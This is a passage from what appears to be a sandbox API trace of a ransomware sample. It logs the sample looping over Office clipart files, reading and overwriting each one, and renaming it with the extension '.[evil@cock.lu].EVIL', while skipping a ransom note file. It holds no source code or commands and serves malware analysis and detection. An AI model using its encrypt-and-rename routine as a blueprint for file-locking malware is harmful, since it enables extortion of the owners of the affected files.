_File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.778] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf.[evil@cock.lu].evil")) returned 1 [0150.779] ??_V@YAXPEAX@Z () returned 0x1 [0150.782] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF", dwFileAttributes=0x200) returned 0 [0150.782] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.782] wcsstr (_Str="J0196060.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.782] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 69 [0150.782] wcscmp (_String1="J0196060.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.783] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0196060.WMF") returned 0x0 [0150.783] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 0x45 [0150.783] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.785] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x128e, lpOverlapped=0x0) returned 1 [0150.794] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.795] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.795] _errno () returned 0x84b1160840 [0150.795] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.795] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12a0, lpOverlapped=0x0) returned 1 [0150.795] CloseHandle (hObject=0x1a8) returned 1 [0150.795] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.795] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.795] __uncaught_exception () returned 0x84b1160800 [0150.795] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.796] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf.[evil@cock.lu].evil")) returned 1 [0150.797] ??_V@YAXPEAX@Z () returned 0x1 [0150.801] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF", dwFileAttributes=0x200) returned 0 [0150.801] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.801] wcsstr (_Str="J0196110.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.801] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 69 [0150.801] wcscmp (_String1="J0196110.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.801] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0196110.WMF") returned 0x0 [0150.801] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 0x45 [0150.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.804] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14ce, lpOverlapped=0x0) returned 1 [0150.813] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.813] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.813] _errno () returned 0x84b1160840 [0150.813] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.813] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14e0, lpOverlapped=0x0) returned 1 [0150.813] CloseHandle (hObject=0x1a8) returned 1 [0150.813] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.813] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.814] __uncaught_exception () returned 0x84b1160800 [0150.814] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.814] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf.[evil@cock.lu].evil")) returned 1 [0150.815] ??_V@YAXPEAX@Z () returned 0x1 [0150.819] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF", dwFileAttributes=0x200) returned 0 [0150.819] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.819] wcsstr (_Str="J0196142.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.819] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 69 [0150.819] wcscmp (_String1="J0196142.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.819] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0196142.WMF") returned 0x0 [0150.819] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 0x45 [0150.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.821] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xef2, lpOverlapped=0x0) returned 1 [0150.836] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.836] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.836] _errno () returned 0x84b1160840 [0150.836] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.836] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf00, lpOverlapped=0x0) returned 1 [0150.836] CloseHandle (hObject=0x1a8) returned 1 [0150.836] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.837] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.837] __uncaught_exception () returned 0x84b1160800 [0150.837] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.837] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf.[evil@cock.lu].evil")) returned 1 [0150.838] ??_V@YAXPEAX@Z () returned 0x1 [0150.842] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF", dwFileAttributes=0x200) returned 0 [0150.842] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.842] wcsstr (_Str="J0196354.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.842] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 69 [0150.842] wcscmp (_String1="J0196354.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.842] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0196354.WMF") returned 0x0 [0150.842] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 0x45 [0150.842] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.846] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3586, lpOverlapped=0x0) returned 1 [0150.863] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.863] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.863] _errno () returned 0x84b1160840 [0150.864] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.864] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x35a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x35a0, lpOverlapped=0x0) returned 1 [0150.864] CloseHandle (hObject=0x1a8) returned 1 [0150.864] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.864] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.864] __uncaught_exception () returned 0x84b1160800 [0150.864] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.865] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf.[evil@cock.lu].evil")) returned 1 [0150.866] ??_V@YAXPEAX@Z () returned 0x1 [0150.869] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF", dwFileAttributes=0x200) returned 0 [0150.870] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.870] wcsstr (_Str="J0196358.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.870] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 69 [0150.870] wcscmp (_String1="J0196358.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.870] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0196358.WMF") returned 0x0 [0150.870] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 0x45 [0150.870] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.873] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b00, lpOverlapped=0x0) returned 1 [0150.880] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.880] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.880] _errno () returned 0x84b1160840 [0150.880] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.880] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b20, lpOverlapped=0x0) returned 1 [0150.880] CloseHandle (hObject=0x1a8) returned 1 [0150.880] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.880] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.881] __uncaught_exception () returned 0x84b1160800 [0150.881] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.881] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf.[evil@cock.lu].evil")) returned 1 [0150.882] ??_V@YAXPEAX@Z () returned 0x1 [0150.886] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF", dwFileAttributes=0x200) returned 0 [0150.886] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.886] wcsstr (_Str="J0196364.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.886] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 69 [0150.886] wcscmp (_String1="J0196364.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.886] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0196364.WMF") returned 0x0 [0150.886] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 0x45 [0150.886] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.889] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x164c, lpOverlapped=0x0) returned 1 [0150.904] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.904] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.904] _errno () returned 0x84b1160840 [0150.904] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.904] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1660, lpOverlapped=0x0) returned 1 [0150.905] CloseHandle (hObject=0x1a8) returned 1 [0150.905] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.905] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.905] __uncaught_exception () returned 0x84b1160800 [0150.905] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.905] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf.[evil@cock.lu].evil")) returned 1 [0150.906] ??_V@YAXPEAX@Z () returned 0x1 [0150.910] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF", dwFileAttributes=0x200) returned 0 [0150.911] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.911] wcsstr (_Str="J0197979.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.911] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 69 [0150.911] wcscmp (_String1="J0197979.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.911] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0197979.WMF") returned 0x0 [0150.911] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 0x45 [0150.911] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.913] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9d26, lpOverlapped=0x0) returned 1 [0150.916] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.916] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.916] _errno () returned 0x84b1160840 [0150.916] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.916] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x9d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9d40, lpOverlapped=0x0) returned 1 [0150.916] CloseHandle (hObject=0x1a8) returned 1 [0150.916] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.917] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.917] __uncaught_exception () returned 0x84b1160800 [0150.917] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.917] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf.[evil@cock.lu].evil")) returned 1 [0150.918] ??_V@YAXPEAX@Z () returned 0x1 [0150.922] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF", dwFileAttributes=0x200) returned 0 [0150.922] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.922] wcsstr (_Str="J0197983.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.922] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 69 [0150.922] wcscmp (_String1="J0197983.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.922] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0197983.WMF") returned 0x0 [0150.922] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 0x45 [0150.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.925] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x668c, lpOverlapped=0x0) returned 1 [0150.953] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.953] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.953] _errno () returned 0x84b1160840 [0150.954] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.954] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x66a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x66a0, lpOverlapped=0x0) returned 1 [0150.954] CloseHandle (hObject=0x1a8) returned 1 [0150.954] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.954] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.954] __uncaught_exception () returned 0x84b1160800 [0150.954] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.954] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf.[evil@cock.lu].evil")) returned 1 [0150.955] ??_V@YAXPEAX@Z () returned 0x1 [0150.958] SetFileAttributesW 